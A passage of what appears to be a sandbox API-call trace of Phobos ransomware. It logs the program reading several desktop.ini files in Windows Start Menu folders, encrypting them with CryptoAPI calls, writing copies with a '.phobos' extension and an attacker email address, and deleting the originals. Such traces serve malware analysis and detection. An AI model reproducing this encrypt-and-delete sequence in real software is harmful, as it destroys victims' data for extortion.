[0147.763] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1338) returned 1 [0147.763] CloseHandle (hObject=0x138) returned 1 [0147.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini")) returned 0x26 [0147.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.763] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.763] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.763] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.763] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.764] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.764] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x53a, lpOverlapped=0x0) returned 1 [0147.764] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x540, dwBufLen=0x540 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x540) returned 1 [0147.764] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x540, lpOverlapped=0x0) returned 1 [0147.765] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.765] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.765] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.765] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.765] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.765] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.765] CloseHandle (hObject=0x138) returned 1 [0147.765] CloseHandle (hObject=0x18c) returned 1 [0147.766] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini")) returned 1 [0147.770] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.770] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=343) returned 1 [0147.770] CloseHandle (hObject=0x18c) returned 1 [0147.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\desktop.ini")) returned 0x26 [0147.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.771] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.771] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.771] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.771] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.772] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.772] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.772] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x157, lpOverlapped=0x0) returned 1 [0147.773] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x160, dwBufLen=0x160 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x160) returned 1 [0147.773] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x160, lpOverlapped=0x0) returned 1 [0147.773] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.773] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.773] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.773] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.773] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.774] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.774] CloseHandle (hObject=0x18c) returned 1 [0147.774] CloseHandle (hObject=0x138) returned 1 [0147.775] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\desktop.ini")) returned 1 [0147.776] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.776] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.776] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=216) returned 1 [0147.776] CloseHandle (hObject=0x138) returned 1 [0147.776] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\desktop.ini")) returned 0x26 [0147.776] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.776] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.777] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.777] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.778] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.778] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.778] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd8, lpOverlapped=0x0) returned 1 [0147.778] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0147.778] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0147.779] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.779] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.779] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.779] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.779] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.779] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.779] CloseHandle (hObject=0x138) returned 1 [0147.779] CloseHandle (hObject=0x18c) returned 1 [0147.780] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\desktop.ini")) returned 1 [0147.782] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.782] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.782] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1958) returned 1 [0147.782] CloseHandle (hObject=0x18c) returned 1 [0147.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini")) returned 0x26 [0147.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.782] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.782] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.782] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.782] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.783] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.783] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.783] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7a6, lpOverlapped=0x0) returned 1 [0147.784] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7b0, dwBufLen=0x7b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7b0) returned 1 [0147.784] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7b0, lpOverlapped=0x0) returned 1 [0147.785] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.785] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.785] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.785] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.785] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.785] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.785] CloseHandle (hObject=0x18c) returned 1 [0147.785] CloseHandle (hObject=0x138) returned 1 [0147.786] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini")) returned 1 [0147.787] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.787] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.787] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1130) returned 1 [0147.787] CloseHandle (hObject=0x138) returned 1 [0147.787] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini")) returned 0x26 [0147.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.788] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.788] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.788] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.788] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.789] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.789] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.789] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x46a, lpOverlapped=0x0) returned 1 [0147.789] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x470, dwBufLen=0x470 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x470) returned 1 [0147.789] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x470, lpOverlapped=0x0) returned 1 [0147.790] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.790] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.790] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.790] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.790] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.790] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.790] CloseHandle (hObject=0x138) returned 1 [0147.791] CloseHandle (hObject=0x18c) returned 1 [0147.792] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini")) returned 1 [0147.793] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.793] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.793] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=520) returned 1 [0147.793] CloseHandle (hObject=0x18c) returned 1 [0147.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\desktop.ini")) returned 0x26 [0147.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.793] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.793] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.793] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.793] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.794] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.794] CryptSetKeyParam 